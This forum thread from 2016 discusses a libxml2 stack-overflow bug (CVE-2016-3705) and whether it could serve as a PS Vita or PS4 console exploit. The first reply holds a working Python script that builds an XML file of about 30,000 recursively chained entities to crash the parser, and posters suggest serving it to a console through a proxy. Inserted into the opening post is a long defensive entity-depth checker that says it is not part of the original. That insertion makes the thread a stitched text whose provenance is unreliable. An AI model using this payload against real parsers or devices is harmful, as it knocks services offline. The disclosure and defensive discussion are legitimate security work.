Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Posted: Wed May 04, 2016 6:05 am
by dragood2
Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect it's an invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't hear back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advised otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without
incrementing the 'depth' counter in the parser context. Because of that
omission, the parser failed to detect attribute recursions in certain
documents before running out of stack space.

Hope this helps guide those that have the skill to take it further.
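A defender-side pre-check for the recursion pattern described above, as an added example that is not part of the original post or of libxml2: it reads the internal DTD subset's entity declarations, computes the deepest chain of nested &name; references without recursing itself, and flags chains that loop, so a document shaped like the one the script produces can be rejected before it ever reaches the parser. The regexes, the 64-level limit and the sample generator are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Assumed regexes: internal general entities with double-quoted literal values,
# e.g. <!ENTITY a1 "&a2;">. Parameter (%) and external entities are not matched.
_ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_:][\w.\-:]*)\s+"([^"]*)"\s*>')
_ENTITY_REF = re.compile(r'&([A-Za-z_:][\w.\-:]*);')

def entity_graph(xml_text: str) -> Dict[str, List[str]]:
    """Map each declared entity name to the entity names its value references."""
    return {name: _ENTITY_REF.findall(value)
            for name, value in _ENTITY_DECL.findall(xml_text)}

def max_expansion_depth(graph: Dict[str, List[str]]) -> Tuple[int, bool]:
    """Return (longest chain of nested entity references, whether any chain loops).
    Iterative DFS, so the checker cannot exhaust its own stack on the input it checks."""
    WHITE, GREY, BLACK = 0, 1, 2
    colour = {name: WHITE for name in graph}
    depth: Dict[str, int] = {}      # memoised chain length below each entity
    cyclic = False
    for root in graph:
        if colour[root] != WHITE:
            continue
        colour[root] = GREY
        stack = [(root, iter(graph[root]))]
        while stack:
            node, children = stack[-1]
            child = next(children, None)
            if child is None:                      # all references visited
                stack.pop()
                colour[node] = BLACK
                depth[node] = 1 + max((depth.get(c, 0) for c in graph[node]), default=0)
            # an undefined entity expands to nothing, so treat it as a finished leaf
            elif colour.get(child, BLACK) == GREY:  # back edge: entity refers to itself
                cyclic = True
            elif colour.get(child, BLACK) == WHITE:
                colour[child] = GREY
                stack.append((child, iter(graph[child])))
    return max(depth.values(), default=0), cyclic

def is_safe_to_parse(xml_text: str, limit: int = 64) -> bool:  # assumed policy limit
    depth, cyclic = max_expansion_depth(entity_graph(xml_text))
    return not cyclic and depth <= limit

def chained_document(n: int) -> str:
    """Constructed sample in the shape of the thread's PoC: a1 -> a2 -> ... -> an."""
    decls = "".join(f'<!ENTITY a{i} "&a{i + 1};">' for i in range(1, n))
    decls += f'<!ENTITY a{n} "leaf">'
    return f'<!DOCTYPE a [{decls}]><r x="&a1;"/>'
```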

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Wed May 04, 2016 6:06 am
by dragood2
Script:
#!/bin/python3
# Writes repo.xml: a DTD whose entities form a long chain of nested
# references, so that expanding &a1; recurses through xmlStringDecodeEntities()
# once per entity.

f = open('repo.xml', 'w')

f.write("<!DOCTYPE a [ ")

i = 1

while (i < 30000):
    # entity a<i> expands to a reference to a<i+1>
    f.write("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i+1

# one more entity pointing back at a1, then a1 referenced from an
# attribute value, the path where the parser's depth counter was not incremented
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Wed May 04, 2016 9:56 pm
by wololo
Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Thu May 05, 2016 12:02 am
by lazydog2055
Looks like there was also an XML exploit in iOS and OS X. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares Sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the web browser comes to be key.

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 4:26 pm
by wololo
Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:30 pm
by xyz
It's useless.

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:43 pm
by wololo
Can you detail why? Stack Protector, but besides that?

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:48 pm
by xyz
It's stack exhaustion due to high recursion depth. As you can see at https://access.redhat.com/security/cve/cve-2016-3705 and https://access.redhat.com/security/cve/cve-2016-3627, both bugs only have availability impact, i.e. it's a DoS.

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:51 pm
by wololo
Thanks

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Sun May 15, 2016 9:11 pm
by Zecoxao
Image